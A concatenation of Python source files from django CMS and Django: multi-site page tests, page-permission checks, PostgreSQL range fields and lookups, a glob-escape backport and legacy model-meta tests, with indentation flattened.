self.assertEqual(Page.objects.on_site(self.site3.pk).count(), 2)
self.assertEqual(Page.objects.drafts().on_site().count(), 2)
with self.settings(SITE_ID=self.site2.pk):
# without param
self.assertEqual(Page.objects.drafts().on_site().count(), 1)
def test_site_preview(self):
page = create_page("page", "nav_playground.html", "de", site=self.site2, published=True)
page_edit_url_on = self.get_edit_on_url(page.get_absolute_url('de'))
with self.login_user_context(self.get_superuser()):
# set the current site on changelist
response = self.client.post(admin_reverse('cms_page_changelist'), {'site': self.site2.pk})
self.assertEqual(response.status_code, 200)
# simulate user clicks on preview icon
response = self.client.get(admin_reverse('cms_page_preview_page', args=[page.pk, 'de']))
self.assertEqual(response.status_code, 302)
self.assertEqual(response._headers['location'][1], 'http://sample2.com{}&language=de'.format(page_edit_url_on))
def test_site_publish(self):
self._login_context.__exit__(None, None, None)
pages = {"2": list(range(0, 5)), "3": list(range(0, 5))}
lang_settings = copy.deepcopy(get_cms_setting('LANGUAGES'))
lang_settings[3][1]['public'] = True
with self.settings(CMS_LANGUAGES=lang_settings, LANGUAGE_CODE="de"):
with self.settings(SITE_ID=self.site2.pk):
pages["2"][0] = create_page("page_2", "nav_playground.html", "de",
site=self.site2, published=True)
pages["2"][1] = create_page("page_2_1", "nav_playground.html", "de",
parent=pages["2"][0], site=self.site2, published=True)
pages["2"][2] = create_page("page_2_2", "nav_playground.html", "de",
parent=pages["2"][0], site=self.site2, published=True)
pages["2"][3] = create_page("page_2_1_1", "nav_playground.html", "de",
parent=pages["2"][1], site=self.site2, published=True)
pages["2"][4] = create_page("page_2_1_2", "nav_playground.html", "de",
parent=pages["2"][1], site=self.site2, published=True)
for page in pages["2"]:
page_url = page.get_absolute_url(language='de')
response = self.client.get(page_url)
self.assertEqual(response.status_code, 200)
with self.settings(SITE_ID=self.site3.pk):
pages["3"][0] = create_page("page_3", "nav_playground.html", "de",
site=self.site3)
pages["3"][0].publish('de')
pages["3"][1] = create_page("page_3_1", "nav_playground.html", "de",
parent=pages["3"][0], site=self.site3, published=True)
pages["3"][2] = create_page("page_3_2", "nav_playground.html", "de",
parent=pages["3"][0], site=self.site3, published=True)
pages["3"][3] = create_page("page_3_1_1", "nav_playground.html", "de",
parent=pages["3"][1], site=self.site3, published=True)
pages["3"][4] = create_page("page_3_1_2", "nav_playground.html", "de",
parent=pages["3"][1], site=self.site3, published=True)
for page in pages["3"]:
if page.is_home:
page_url = "/de/"
else:
page_url = page.get_absolute_url(language='de')
response = self.client.get(page_url)
self.assertEqual(response.status_code, 200)
def test_site_delete(self):
with self.settings(SITE_ID=self.site2.pk):
create_page("page_2a", "nav_playground.html", "de", site=self.site2)
self.assertEqual(Placeholder.objects.count(), 2)
self.site2.delete()
self.assertEqual(Placeholder.objects.count(), 0)
```
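The site scoping exercised above comes down to `Page.objects.on_site()`, which accepts an explicit site (or pk) and otherwise resolves the current one from `SITE_ID`. A short sketch of the two call styles used in the tests:

```python
from cms.models import Page

Page.objects.on_site(2)           # pages attached to the site with pk=2
Page.objects.drafts().on_site()   # drafts on the site resolved from settings
```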
#### File: cms/utils/page_permissions.py
```python
from functools import wraps
from django.utils.decorators import available_attrs
from cms.api import get_page_draft
from cms.cache.permissions import get_permission_cache, set_permission_cache
from cms.constants import GRANT_ALL_PERMISSIONS
from cms.models import Page, Placeholder
from cms.utils import get_current_site
from cms.utils.conf import get_cms_setting
from cms.utils.permissions import (
cached_func,
get_model_permission_codename,
get_page_actions_for_user,
has_global_permission,
)
PAGE_ADD_CODENAME = get_model_permission_codename(Page, 'add')
PAGE_CHANGE_CODENAME = get_model_permission_codename(Page, 'change')
PAGE_DELETE_CODENAME = get_model_permission_codename(Page, 'delete')
PAGE_PUBLISH_CODENAME = get_model_permission_codename(Page, 'publish')
PAGE_VIEW_CODENAME = get_model_permission_codename(Page, 'view')
# Maps an action to the required Django auth permission codes
_django_permissions_by_action = {
'add_page': [PAGE_ADD_CODENAME, PAGE_CHANGE_CODENAME],
'change_page': [PAGE_CHANGE_CODENAME],
'change_page_advanced_settings': [PAGE_CHANGE_CODENAME],
'change_page_permissions': [PAGE_CHANGE_CODENAME],
'delete_page': [PAGE_CHANGE_CODENAME, PAGE_DELETE_CODENAME],
'delete_page_translation': [PAGE_CHANGE_CODENAME, PAGE_DELETE_CODENAME],
'move_page': [PAGE_CHANGE_CODENAME],
'publish_page': [PAGE_CHANGE_CODENAME, PAGE_PUBLISH_CODENAME],
'revert_page_to_live': [PAGE_CHANGE_CODENAME]
}
def _get_draft_placeholders(page):
if page.publisher_is_draft:
return page.placeholders.all()
return Placeholder.objects.filter(page__pk=page.publisher_public_id)
def _check_delete_translation(user, page, language, site=None):
return user_can_change_page(user, page, site=site)
def _get_page_ids_for_action(user, site, action, check_global=True, use_cache=True):
if user.is_superuser or not get_cms_setting('PERMISSION'):
        # Superuser, or permissions not enabled?
        # Just return the grant-all marker.
return GRANT_ALL_PERMISSIONS
if use_cache:
# read from cache if possible
cached = get_permission_cache(user, action)
get_page_actions = get_page_actions_for_user
else:
cached = None
get_page_actions = get_page_actions_for_user.without_cache
if cached is not None:
return cached
if check_global and has_global_permission(user, site, action=action, use_cache=use_cache):
return GRANT_ALL_PERMISSIONS
page_actions = get_page_actions(user, site)
page_ids = list(page_actions[action])
set_permission_cache(user, action, page_ids)
return page_ids
def auth_permission_required(action):
def decorator(func):
@wraps(func, assigned=available_attrs(func))
def wrapper(user, *args, **kwargs):
if not user.is_authenticated():
return False
permissions = _django_permissions_by_action[action]
if not user.has_perms(permissions):
# Fail fast if the user does not have permissions
# in Django to perform the action.
return False
permissions_enabled = get_cms_setting('PERMISSION')
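            # Superusers, and installs with CMS_PERMISSION disabled, skip the
            # row-level check below and are granted the action outright.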
if not user.is_superuser and permissions_enabled:
return func(user, *args, **kwargs)
return True
return wrapper
return decorator
def change_permission_required(func):
@wraps(func, assigned=available_attrs(func))
def wrapper(user, page, site=None):
if not user_can_change_page(user, page, site=site):
return False
return func(user, page, site=site)
return wrapper
def skip_if_permissions_disabled(func):
@wraps(func, assigned=available_attrs(func))
def wrapper(user, page, site=None):
if not get_cms_setting('PERMISSION'):
return True
return func(user, page, site=site)
return wrapper
@cached_func
@auth_permission_required('add_page')
def user_can_add_page(user, site=None):
if site is None:
site = get_current_site()
return has_global_permission(user, site, action='add_page')
@cached_func
@auth_permission_required('add_page')
def user_can_add_subpage(user, target, site=None):
"""
Return true if the current user has permission to add a new page
under target.
:param user:
:param target: a Page object
:param site: optional Site object (not just PK)
:return: Boolean
"""
has_perm = has_generic_permission(
page=target,
user=user,
action='add_page',
site=site,
)
return has_perm
@cached_func
@auth_permission_required('change_page')
def user_can_change_page(user, page, site=None):
can_change = has_generic_permission(
page=page,
user=user,
action='change_page',
site=site,
)
return can_change
@cached_func
@auth_permission_required('delete_page')
def user_can_delete_page(user, page, site=None):
has_perm = has_generic_permission(
page=page,
user=user,
action='delete_page',
site=site,
)
if not has_perm:
return False
languages = page.get_languages()
placeholders = (
_get_draft_placeholders(page)
.filter(cmsplugin__language__in=languages)
.distinct()
)
for placeholder in placeholders.iterator():
if not placeholder.has_delete_plugins_permission(user, languages):
return False
return True
@cached_func
@auth_permission_required('delete_page_translation')
def user_can_delete_page_translation(user, page, language, site=None):
has_perm = has_generic_permission(
page=page,
user=user,
action='delete_page_translation',
site=site,
)
if not has_perm:
return False
placeholders = (
_get_draft_placeholders(page)
.filter(cmsplugin__language=language)
.distinct()
)
for placeholder in placeholders.iterator():
if not placeholder.has_delete_plugins_permission(user, [language]):
return False
return True
@cached_func
@auth_permission_required('change_page')
def user_can_revert_page_to_live(user, page, language, site=None):
if not user_can_change_page(user, page, site=site):
return False
placeholders = (
_get_draft_placeholders(page)
.filter(cmsplugin__language=language)
.distinct()
)
for placeholder in placeholders.iterator():
if not placeholder.has_delete_plugins_permission(user, [language]):
return False
return True
@cached_func
@auth_permission_required('publish_page')
def user_can_publish_page(user, page, site=None):
has_perm = has_generic_permission(
page=page,
user=user,
action='publish_page',
site=site,
)
return has_perm
@cached_func
@auth_permission_required('change_page_advanced_settings')
def user_can_change_page_advanced_settings(user, page, site=None):
has_perm = has_generic_permission(
page=page,
user=user,
action='change_page_advanced_settings',
site=site,
)
return has_perm
@cached_func
@auth_permission_required('change_page_permissions')
def user_can_change_page_permissions(user, page, site=None):
has_perm = has_generic_permission(
page=page,
user=user,
action='change_page_permissions',
site=site,
)
return has_perm
@cached_func
@auth_permission_required('move_page')
def user_can_move_page(user, page, site=None):
has_perm = has_generic_permission(
page=page,
user=user,
action='move_page',
site=site,
)
return has_perm
@cached_func
def user_can_view_page(user, page, site=None):
if site is None:
site = get_current_site()
if user.is_superuser:
return True
public_for = get_cms_setting('PUBLIC_FOR')
can_see_unrestricted = public_for == 'all' or (public_for == 'staff' and user.is_staff)
page = get_page_draft(page)
# inherited and direct view permissions
is_restricted = page.has_view_restrictions(site)
if not is_restricted and can_see_unrestricted:
# Page has no restrictions and project is configured
# to allow everyone to see unrestricted pages.
return True
elif not user.is_authenticated():
# Page has restrictions or project is configured
# to require staff user status to see pages.
return False
if user_can_view_all_pages(user, site=site):
return True
if not is_restricted:
# Page has no restrictions but user can't see unrestricted pages
return False
if user_can_change_page(user, page):
# If user has change permissions on a page
# then he can automatically view it.
return True
has_perm = has_generic_permission(
page=page,
user=user,
action='view_page',
check_global=False,
)
return has_perm
@cached_func
@auth_permission_required('change_page')
def user_can_view_page_draft(user, page, site=None):
has_perm = has_generic_permission(
page=page,
user=user,
action='change_page',
site=site,
)
return has_perm
@cached_func
@auth_permission_required('change_page')
def user_can_change_all_pages(user, site):
return has_global_permission(user, site, action='change_page')
@auth_permission_required('change_page')
def user_can_change_at_least_one_page(user, site, use_cache=True):
page_ids = get_change_id_list(
user=user,
site=site,
check_global=True,
use_cache=use_cache,
)
return page_ids == GRANT_ALL_PERMISSIONS or bool(page_ids)
@cached_func
def user_can_view_all_pages(user, site):
if user.is_superuser:
return True
if not get_cms_setting('PERMISSION'):
public_for = get_cms_setting('PUBLIC_FOR')
can_see_unrestricted = public_for == 'all' or (public_for == 'staff' and user.is_staff)
return can_see_unrestricted
if not user.is_authenticated():
return False
if user.has_perm(PAGE_VIEW_CODENAME):
# This is for backwards compatibility.
# The previous system allowed any user with the explicit view_page
# permission to see all pages.
return True
if user_can_change_all_pages(user, site):
# If a user can change all pages then he can see all pages.
return True
return has_global_permission(user, site, action='view_page')
def get_add_id_list(user, site, check_global=True, use_cache=True):
"""
Give a list of page where the user has add page rights or the string
"All" if the user has all rights.
"""
page_ids = _get_page_ids_for_action(
user=user,
site=site,
action='add_page',
check_global=check_global,
use_cache=use_cache,
)
return page_ids
def get_change_id_list(user, site, check_global=True, use_cache=True):
"""
Give a list of page where the user has edit rights or the string "All" if
the user has all rights.
"""
page_ids = _get_page_ids_for_action(
user=user,
site=site,
action='change_page',
check_global=check_global,
use_cache=use_cache,
)
return page_ids
def get_change_advanced_settings_id_list(user, site, check_global=True, use_cache=True):
"""
Give a list of page where the user can change advanced settings or the
string "All" if the user has all rights.
"""
page_ids = _get_page_ids_for_action(
user=user,
site=site,
action='change_page_advanced_settings',
check_global=check_global,
use_cache=use_cache,
)
return page_ids
def get_change_permissions_id_list(user, site, check_global=True, use_cache=True):
"""Give a list of page where the user can change permissions.
"""
page_ids = _get_page_ids_for_action(
user=user,
site=site,
action='change_page_permissions',
check_global=check_global,
use_cache=use_cache,
)
return page_ids
def get_delete_id_list(user, site, check_global=True, use_cache=True):
"""
Give a list of page where the user has delete rights or the string "All" if
the user has all rights.
"""
page_ids = _get_page_ids_for_action(
user=user,
site=site,
action='delete_page',
check_global=check_global,
use_cache=use_cache,
)
return page_ids
def get_move_page_id_list(user, site, check_global=True, use_cache=True):
"""Give a list of pages which user can move.
"""
page_ids = _get_page_ids_for_action(
user=user,
site=site,
action='move_page',
check_global=check_global,
use_cache=use_cache,
)
return page_ids
def get_publish_id_list(user, site, check_global=True, use_cache=True):
"""
Give a list of page where the user has publish rights or the string "All" if
the user has all rights.
"""
page_ids = _get_page_ids_for_action(
user=user,
site=site,
action='publish_page',
check_global=check_global,
use_cache=use_cache,
)
return page_ids
def get_view_id_list(user, site, check_global=True, use_cache=True):
"""Give a list of pages which user can view.
"""
page_ids = _get_page_ids_for_action(
user=user,
site=site,
action='view_page',
check_global=check_global,
use_cache=use_cache,
)
return page_ids
def has_generic_permission(page, user, action, site=None, check_global=True):
if site is None:
site = get_current_site()
if page.publisher_is_draft:
page_id = page.pk
else:
page_id = page.publisher_public_id
actions_map = {
'add_page': get_add_id_list,
'change_page': get_change_id_list,
'change_page_advanced_settings': get_change_advanced_settings_id_list,
'change_page_permissions': get_change_permissions_id_list,
'delete_page': get_delete_id_list,
'delete_page_translation': get_delete_id_list,
'move_page': get_move_page_id_list,
'publish_page': get_publish_id_list,
'view_page': get_view_id_list,
}
func = actions_map[action]
page_ids = func(user, site, check_global=check_global)
return page_ids == GRANT_ALL_PERMISSIONS or page_id in page_ids
```
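A minimal usage sketch for the permission helpers above, assuming `user` and `page` objects from a django CMS project; the helpers are wrapped in `cached_func`, so repeated checks are cheap (`publish_if_allowed` is an illustrative name, not part of the module):

```python
from cms.utils.page_permissions import (
    user_can_change_page,
    user_can_publish_page,
)

def publish_if_allowed(user, page, language='en'):
    # Publish only when the user holds both change and publish permissions.
    if user_can_change_page(user, page) and user_can_publish_page(user, page):
        page.publish(language)
        return True
    return False
```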
|
{
"source": "jedie/django",
"score": 2
}
|
#### File: postgres/fields/ranges.py
```python
import json
from psycopg2.extras import DateRange, DateTimeTZRange, NumericRange, Range
from django.contrib.postgres import forms, lookups
from django.db import models
from django.utils import six
from .utils import AttributeSetter
__all__ = [
'RangeField', 'IntegerRangeField', 'BigIntegerRangeField',
'FloatRangeField', 'DateTimeRangeField', 'DateRangeField',
]
class RangeField(models.Field):
empty_strings_allowed = False
def get_prep_value(self, value):
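        # Lists/tuples are promoted to the field's range type, so assigning
        # e.g. (1, 5) to an IntegerRangeField stores NumericRange(1, 5).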
if value is None:
return None
elif isinstance(value, Range):
return value
elif isinstance(value, (list, tuple)):
return self.range_type(value[0], value[1])
return value
def to_python(self, value):
if isinstance(value, six.string_types):
# Assume we're deserializing
vals = json.loads(value)
for end in ('lower', 'upper'):
if end in vals:
vals[end] = self.base_field.to_python(vals[end])
value = self.range_type(**vals)
elif isinstance(value, (list, tuple)):
value = self.range_type(value[0], value[1])
return value
def set_attributes_from_name(self, name):
super(RangeField, self).set_attributes_from_name(name)
self.base_field.set_attributes_from_name(name)
def value_to_string(self, obj):
value = self._get_val_from_obj(obj)
if value is None:
return None
if value.isempty:
return json.dumps({"empty": True})
base_field = self.base_field
result = {"bounds": value._bounds}
for end in ('lower', 'upper'):
obj = AttributeSetter(base_field.attname, getattr(value, end))
result[end] = base_field.value_to_string(obj)
return json.dumps(result)
def formfield(self, **kwargs):
kwargs.setdefault('form_class', self.form_field)
return super(RangeField, self).formfield(**kwargs)
class IntegerRangeField(RangeField):
base_field = models.IntegerField()
range_type = NumericRange
form_field = forms.IntegerRangeField
def db_type(self, connection):
return 'int4range'
class BigIntegerRangeField(RangeField):
base_field = models.BigIntegerField()
range_type = NumericRange
form_field = forms.IntegerRangeField
def db_type(self, connection):
return 'int8range'
class FloatRangeField(RangeField):
base_field = models.FloatField()
range_type = NumericRange
form_field = forms.FloatRangeField
def db_type(self, connection):
return 'numrange'
class DateTimeRangeField(RangeField):
base_field = models.DateTimeField()
range_type = DateTimeTZRange
form_field = forms.DateTimeRangeField
def db_type(self, connection):
return 'tstzrange'
class DateRangeField(RangeField):
base_field = models.DateField()
range_type = DateRange
form_field = forms.DateRangeField
def db_type(self, connection):
return 'daterange'
RangeField.register_lookup(lookups.DataContains)
RangeField.register_lookup(lookups.ContainedBy)
RangeField.register_lookup(lookups.Overlap)
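# ``contained_by`` is also useful on plain scalar columns; the lookup below
# casts the scalar to the matching range type in SQL so it can be compared
# with a range value, and is registered on the scalar field classes further
# down.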
class RangeContainedBy(models.Lookup):
lookup_name = 'contained_by'
type_mapping = {
'integer': 'int4range',
'bigint': 'int8range',
'double precision': 'numrange',
'date': 'daterange',
'timestamp with time zone': 'tstzrange',
}
def as_sql(self, qn, connection):
field = self.lhs.output_field
if isinstance(field, models.FloatField):
sql = '%s::numeric <@ %s::{}'.format(self.type_mapping[field.db_type(connection)])
else:
sql = '%s <@ %s::{}'.format(self.type_mapping[field.db_type(connection)])
lhs, lhs_params = self.process_lhs(qn, connection)
rhs, rhs_params = self.process_rhs(qn, connection)
params = lhs_params + rhs_params
return sql % (lhs, rhs), params
def get_prep_lookup(self):
return RangeField().get_prep_lookup(self.lookup_name, self.rhs)
models.DateField.register_lookup(RangeContainedBy)
models.DateTimeField.register_lookup(RangeContainedBy)
models.IntegerField.register_lookup(RangeContainedBy)
models.BigIntegerField.register_lookup(RangeContainedBy)
models.FloatField.register_lookup(RangeContainedBy)
@RangeField.register_lookup
class FullyLessThan(lookups.PostgresSimpleLookup):
lookup_name = 'fully_lt'
operator = '<<'
@RangeField.register_lookup
class FullGreaterThan(lookups.PostgresSimpleLookup):
lookup_name = 'fully_gt'
operator = '>>'
@RangeField.register_lookup
class NotLessThan(lookups.PostgresSimpleLookup):
lookup_name = 'not_lt'
operator = '&>'
@RangeField.register_lookup
class NotGreaterThan(lookups.PostgresSimpleLookup):
lookup_name = 'not_gt'
operator = '&<'
@RangeField.register_lookup
class AdjacentToLookup(lookups.PostgresSimpleLookup):
lookup_name = 'adjacent_to'
operator = '-|-'
@RangeField.register_lookup
class RangeStartsWith(lookups.FunctionTransform):
lookup_name = 'startswith'
function = 'lower'
@property
def output_field(self):
return self.lhs.output_field.base_field
@RangeField.register_lookup
class RangeEndsWith(lookups.FunctionTransform):
lookup_name = 'endswith'
function = 'upper'
@property
def output_field(self):
return self.lhs.output_field.base_field
@RangeField.register_lookup
class IsEmpty(lookups.FunctionTransform):
lookup_name = 'isempty'
function = 'isempty'
output_field = models.BooleanField()
```
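A minimal sketch of how these fields and lookups combine at the ORM level; the `Event` model and the queries below are illustrative assumptions, not part of the module:
```python
from django.contrib.postgres.fields import IntegerRangeField
from django.db import models
from psycopg2.extras import NumericRange

class Event(models.Model):  # hypothetical model
    ages = IntegerRangeField()
    seats = models.IntegerField()

# Lookups registered on RangeField above:
Event.objects.filter(ages__contains=7)                   # DataContains
Event.objects.filter(ages__overlap=NumericRange(5, 12))  # Overlap
Event.objects.filter(ages__startswith=5)                 # lower(ages) = 5
# RangeContainedBy, registered on scalar fields such as IntegerField:
Event.objects.filter(seats__contained_by=NumericRange(0, 500))
```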
#### File: django/utils/glob.py
```python
from __future__ import unicode_literals
import os.path
import re
from django.utils import six
# backport of Python 3.4's glob.escape
try:
from glob import escape as glob_escape
except ImportError:
_magic_check = re.compile('([*?[])')
if six.PY3:
_magic_check_bytes = re.compile(b'([*?[])')
def glob_escape(pathname):
"""
Escape all special characters.
"""
drive, pathname = os.path.splitdrive(pathname)
if isinstance(pathname, bytes):
pathname = _magic_check_bytes.sub(br'[\1]', pathname)
else:
pathname = _magic_check.sub(r'[\1]', pathname)
return drive + pathname
else:
def glob_escape(pathname):
"""
Escape all special characters.
"""
drive, pathname = os.path.splitdrive(pathname)
pathname = _magic_check.sub(r'[\1]', pathname)
return drive + pathname
```
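A quick illustration of what `glob_escape` produces; the path is hypothetical:
```python
from django.utils.glob import glob_escape

pattern = glob_escape('media/[logs]/report?*.txt')
# -> 'media/[[]logs]/report[?][*].txt': *, ? and [ are wrapped in
#    character classes so glob.glob() treats them literally.
```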
#### File: tests/model_meta/test_legacy.py
```python
import warnings
from django import test
from django.contrib.contenttypes.fields import GenericRelation
from django.core.exceptions import FieldDoesNotExist
from django.db.models.fields import CharField, related
from django.utils.deprecation import RemovedInDjango20Warning
from .models import BasePerson, Person
from .results import TEST_RESULTS
class OptionsBaseTests(test.SimpleTestCase):
def _map_related_query_names(self, res):
return tuple((o.field.related_query_name(), m) for o, m in res)
def _map_names(self, res):
return tuple((f.name, m) for f, m in res)
class M2MTests(OptionsBaseTests):
def test_many_to_many_with_model(self):
for model, expected_result in TEST_RESULTS['many_to_many_with_model'].items():
with warnings.catch_warnings(record=True) as warning:
warnings.simplefilter("always")
models = [model for field, model in model._meta.get_m2m_with_model()]
self.assertEqual([RemovedInDjango20Warning], [w.message.__class__ for w in warning])
self.assertEqual(models, expected_result)
@test.ignore_warnings(category=RemovedInDjango20Warning)
class RelatedObjectsTests(OptionsBaseTests):
key_name = lambda self, r: r[0]
def test_related_objects(self):
result_key = 'get_all_related_objects_with_model_legacy'
for model, expected in TEST_RESULTS[result_key].items():
objects = model._meta.get_all_related_objects_with_model()
self.assertEqual(self._map_related_query_names(objects), expected)
def test_related_objects_local(self):
result_key = 'get_all_related_objects_with_model_local_legacy'
for model, expected in TEST_RESULTS[result_key].items():
objects = model._meta.get_all_related_objects_with_model(local_only=True)
self.assertEqual(self._map_related_query_names(objects), expected)
def test_related_objects_include_hidden(self):
result_key = 'get_all_related_objects_with_model_hidden_legacy'
for model, expected in TEST_RESULTS[result_key].items():
objects = model._meta.get_all_related_objects_with_model(include_hidden=True)
self.assertEqual(
sorted(self._map_names(objects), key=self.key_name),
sorted(expected, key=self.key_name)
)
def test_related_objects_include_hidden_local_only(self):
result_key = 'get_all_related_objects_with_model_hidden_local_legacy'
for model, expected in TEST_RESULTS[result_key].items():
objects = model._meta.get_all_related_objects_with_model(
include_hidden=True, local_only=True)
self.assertEqual(
sorted(self._map_names(objects), key=self.key_name),
sorted(expected, key=self.key_name)
)
def test_related_objects_proxy(self):
result_key = 'get_all_related_objects_with_model_proxy_legacy'
for model, expected in TEST_RESULTS[result_key].items():
objects = model._meta.get_all_related_objects_with_model(
include_proxy_eq=True)
self.assertEqual(self._map_related_query_names(objects), expected)
def test_related_objects_proxy_hidden(self):
result_key = 'get_all_related_objects_with_model_proxy_hidden_legacy'
for model, expected in TEST_RESULTS[result_key].items():
objects = model._meta.get_all_related_objects_with_model(
include_proxy_eq=True, include_hidden=True)
self.assertEqual(
sorted(self._map_names(objects), key=self.key_name),
sorted(expected, key=self.key_name)
)
@test.ignore_warnings(category=RemovedInDjango20Warning)
class RelatedM2MTests(OptionsBaseTests):
def test_related_m2m_with_model(self):
result_key = 'get_all_related_many_to_many_with_model_legacy'
for model, expected in TEST_RESULTS[result_key].items():
objects = model._meta.get_all_related_m2m_objects_with_model()
self.assertEqual(self._map_related_query_names(objects), expected)
def test_related_m2m_local_only(self):
result_key = 'get_all_related_many_to_many_local_legacy'
for model, expected in TEST_RESULTS[result_key].items():
objects = model._meta.get_all_related_many_to_many_objects(local_only=True)
self.assertEqual([o.field.related_query_name() for o in objects], expected)
def test_related_m2m_asymmetrical(self):
m2m = Person._meta.many_to_many
self.assertTrue('following_base' in [f.attname for f in m2m])
related_m2m = Person._meta.get_all_related_many_to_many_objects()
self.assertTrue('followers_base' in [o.field.related_query_name() for o in related_m2m])
def test_related_m2m_symmetrical(self):
m2m = Person._meta.many_to_many
self.assertTrue('friends_base' in [f.attname for f in m2m])
related_m2m = Person._meta.get_all_related_many_to_many_objects()
self.assertIn('friends_inherited_rel_+', [o.field.related_query_name() for o in related_m2m])
@test.ignore_warnings(category=RemovedInDjango20Warning)
class GetFieldByNameTests(OptionsBaseTests):
def test_get_data_field(self):
field_info = Person._meta.get_field_by_name('data_abstract')
self.assertEqual(field_info[1:], (BasePerson, True, False))
self.assertIsInstance(field_info[0], CharField)
def test_get_m2m_field(self):
field_info = Person._meta.get_field_by_name('m2m_base')
self.assertEqual(field_info[1:], (BasePerson, True, True))
self.assertIsInstance(field_info[0], related.ManyToManyField)
def test_get_related_object(self):
field_info = Person._meta.get_field_by_name('relating_baseperson')
self.assertEqual(field_info[1:], (BasePerson, False, False))
self.assertTrue(field_info[0].auto_created)
def test_get_related_m2m(self):
field_info = Person._meta.get_field_by_name('relating_people')
self.assertEqual(field_info[1:], (None, False, True))
self.assertTrue(field_info[0].auto_created)
def test_get_generic_relation(self):
field_info = Person._meta.get_field_by_name('generic_relation_base')
self.assertEqual(field_info[1:], (None, True, False))
self.assertIsInstance(field_info[0], GenericRelation)
def test_get_m2m_field_invalid(self):
with warnings.catch_warnings(record=True) as warning:
warnings.simplefilter("always")
self.assertRaises(
FieldDoesNotExist,
Person._meta.get_field,
**{'field_name': 'm2m_base', 'many_to_many': False}
)
self.assertEqual(Person._meta.get_field('m2m_base', many_to_many=True).name, 'm2m_base')
# 2 RemovedInDjango20Warning messages should be raised, one for each call of get_field()
# with the 'many_to_many' argument.
self.assertEqual(
[RemovedInDjango20Warning, RemovedInDjango20Warning],
[w.message.__class__ for w in warning]
)
@test.ignore_warnings(category=RemovedInDjango20Warning)
class GetAllFieldNamesTestCase(OptionsBaseTests):
def test_get_all_field_names(self):
for model, expected_names in TEST_RESULTS['get_all_field_names'].items():
objects = model._meta.get_all_field_names()
self.assertEqual(sorted(map(str, objects)), sorted(expected_names))
```
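Since every test above exercises a `RemovedInDjango20Warning` code path, here is a hedged sketch of the replacement `Model._meta` API (Django 1.8+) that these legacy calls map to; `Person` is the test model imported above:
```python
# New-style equivalents of the deprecated calls exercised above.
field = Person._meta.get_field('data_abstract')       # get_field_by_name()[0]
names = [f.name for f in Person._meta.get_fields()]   # get_all_field_names()
related = [
    f for f in Person._meta.get_fields()
    if (f.one_to_many or f.one_to_one) and f.auto_created and not f.concrete
]  # get_all_related_objects()
```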